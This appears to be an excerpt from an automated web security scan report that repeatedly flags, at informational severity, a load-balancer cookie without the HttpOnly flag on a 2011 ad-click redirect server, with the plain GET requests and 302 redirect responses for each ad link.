GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:56:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:07:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.426. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.429. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:44:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.431. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:18:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.434. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
